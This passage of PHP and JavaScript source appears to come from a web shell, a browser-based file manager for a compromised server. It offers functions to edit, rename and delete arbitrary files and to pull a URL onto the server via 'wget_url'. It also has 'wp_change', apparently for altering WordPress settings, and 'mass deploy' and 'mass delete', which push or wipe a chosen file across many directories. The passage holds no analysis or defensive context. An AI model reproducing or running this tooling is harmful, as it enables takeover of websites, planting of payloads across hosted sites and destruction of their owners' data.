var i = document.createElement("input");
i.name = "edit";
i.value = path;
f.appendChild(i);
document.body.appendChild(f);
f.submit();
}
function renameFile(path, name) {
var nn = prompt("New name:", name);
if (nn && nn !== name) {
var f = document.createElement("form");
f.method = "post";
var i1 = document.createElement("input");
i1.name = "ren";
i1.value = path;
var i2 = document.createElement("input");
i2.name = "new";
i2.value = nn;
f.appendChild(i1);
f.appendChild(i2);
document.body.appendChild(f);
f.submit();
}
}
function selectFile(filename) {
var divs = document.querySelectorAll('#massDeployPopup div[style*="cursor:pointer"]');
for (var x = 0; x < divs.length; x++) {
divs[x].style.background = '#333';
}
event.target.style.background = '#007acc';
document.getElementById('deploy_file_path').value = '<?php echo addslashes($d); ?>/' + filename;
}
function showPopup(id) {
document.getElementById(id).style.display = 'block';
}
function hidePopup(id) {
document.getElementById(id).style.display = 'none';
}
function doWget() {
var u = document.getElementById('wgetUrl').value;
if (u) {
var f = document.createElement("form");
f.method = "post";
var i = document.createElement("input");
i.name = "wget_url";
i.value = u;
f.appendChild(i);
document.body.appendChild(f);
f.submit();
}
}
function doWpChange() {
var f = document.createElement("form");
f.method = "post";
var i = document.createElement("input");
i.name = "wp_change";
i.value = "1";
f.appendChild(i);
document.body.appendChild(f);
f.submit();
}
function doMassDeploy() {
var f = document.createElement("form");
f.method = "post";
var i1 = document.createElement("input");
i1.name = "deploy_file_path";
i1.value = document.getElementById('deploy_file_path').value;
f.appendChild(i1);
var i2 = document.createElement("input");
i2.name = "mass_deploy";
i2.value = "1";
f.appendChild(i2);
var cbd = document.getElementById('custom_base_dir').value;
if (cbd && cbd.trim() !== '') {
var i3 = document.createElement("input");
i3.name = "custom_base_dir";
i3.value = cbd;
f.appendChild(i3);
}
document.body.appendChild(f);
f.submit();
}
function doMassDelete() {
var f = document.createElement("form");
f.method = "post";
var i1 = document.createElement("input");
i1.name = "deploy_file_path";
i1.value = document.getElementById('deploy_file_path').value;
f.appendChild(i1);
var i2 = document.createElement("input");
i2.name = "mass_delete";
i2.value = "1";
f.appendChild(i2);
var cbd = document.getElementById('custom_base_dir').value;
if (cbd && cbd.trim() !== '') {
var i3 = document.createElement("input");
i3.name = "custom_base_dir";
i3.value = cbd;
f.appendChild(i3);
}
document.body.appendChild(f);
f.submit();
}
// Show results popup if there are results
window.onload = function() {
<?php if (isset($_SESSION['mass_deploy_results']) || isset($_SESSION['mass_delete_results']) || isset($_SESSION['wp_results'])): ?>
document.getElementById('resultsPopup').style.display = 'block';
<?php endif; ?>
};
</script>
<?php
// Display path breadcrumb
$pp = explode("/", $d);
echo "<div class='dir-path'>";
foreach ($pp as $k => $v) {
if ($v == "" && $k == 0) {
echo "<a href='#' onclick='goDir(\"/\")'>/</a>";
continue;
}
$dp = implode("/", array_slice($pp, 0, $k + 1));
echo "<a href='#' onclick='goDir(\"" . addslashes($dp) . "\")'>$v</a>/";
}
echo "</div>";
// Display files
$it = @scandir($d);
if ($it !== false) {
echo "<div class='file-list'>";
foreach ($it as $item) {
$fp = $d . '/' . $item;
if ($item == '.' || $item == '..') continue;
if (is_dir($fp)) {
echo "<div class='file-item folder' onclick='goDir(\"" . addslashes($fp) . "\")' style='cursor:pointer;'>";
echo "<div class='file-icon'>📁</div>";
echo "<div class='file-name'>$item</div>";
echo "<div class='file-size'>--</div>";
echo "<div class='file-actions'>";
echo "<button onclick='event.stopPropagation();renameFile(\"" . addslashes($fp) . "\",\"$item\")'>Rename</button>";
echo "</div>";
echo "</div>";
} else {
$sz = filesize($fp);
$szf = $sz >= 1048576 ? round($sz / 1048576, 2) . ' MB' : ($sz >= 1024 ? round($sz / 1024, 2) . ' KB' : $sz . ' B');
echo "<div class='file-item file'>";
echo "<div class='file-icon'>📄</div>";
echo "<div class='file-name' onclick='window.open(\"" . addslashes($fp) . "\",\"_blank\")' style='cursor:pointer;'>$item</div>";
echo "<div class='file-size'>$szf</div>";
echo "<div class='file-actions'>";
echo "<button onclick='deleteFile(\"" . addslashes($fp) . "\")'>Delete</button>";
echo "<button onclick='editFile(\"" . addslashes($fp) . "\")'>Edit</button>";
echo "<button onclick='renameFile(\"" . addslashes($fp) . "\",\"$item\")'>Rename</button>";
echo "</div>";
echo "</div>";
}
}
echo "</div>";
} else {
echo "<p style='color:red;padding:20px;'>Unable to read directory: $d</p>";
}
// Edit mode
if (isset($_POST['edit'])) {
$fp = $_POST['edit'];
$fd = dirname($fp);
$content = htmlspecialchars(file_get_contents($fp));
echo "<style>.file-list{display:none;}</style>";
echo "<div style='padding:20px;'>";
echo "<a href='#' onclick='goDir(\"" . addslashes($fd) . "\")' style='color:white;text-decoration:none;font-weight:bold;'>← Back</a>";
echo "<h3 style='color:white;margin:15px 0;'>Editing: " . basename($fp) . "</h3>";
echo "<form method='post'>";
echo "<input type='hidden' name='obj' value='" . htmlspecialchars($_POST['edit']) . "'>";
echo "<input type='hidden' name='d' value='" . urlencode($fd) . "'>";
echo "<textarea name='content' style='width:100%;height:500px;background:#1a1a1a;color:#fff;border:1px solid #444;border-radius:5px;padding:15px;font-family:monospace;'>$content</textarea>";
echo "<div style='text-align:center;margin-top:15px;'>";
echo "<button type='submit' name='save' class='tool-button' style='padding:10px 20px;font-size:14px;'>Save File</button>";
echo "</div>";
echo "</form>";
echo "</div>";
}
// Rename mode
if (isset($_POST['ren']) && !isset($_POST['new'])) {
$op = $_POST['ren'];
$od = dirname($op);
echo "<style>.file-list{display:none;}</style>";
echo "<div style='padding:20px;'>";
echo "<a href='#' onclick='goDir(\"" . addslashes($od) . "\")' style='color:white;text-decoration:none;font-weight:bold;'>← Back</a>";
echo "<h3 style='color:white;margin:15px 0;'>Renaming: " . basename($op) . "</h3>";
echo "<form method='post'>";
echo "<input type='hidden' name='ren' value='" . htmlspecialchars($_POST['ren']) . "'>";
echo "<input type='hidden' name='d' value='" . urlencode($od) . "'>";
echo "<p>New Name: <input name='new' type='text' value='" . basename($op) . "' style='color:#000;padding:5px;'></p>";
echo "<input type='submit' value='Rename' class='tool-button' style='padding:10px 20px;font-size:14px;'>";
echo "</form>";
echo "</div>";
}
// Show debug panel
show_debug();
?>
</body>
</html>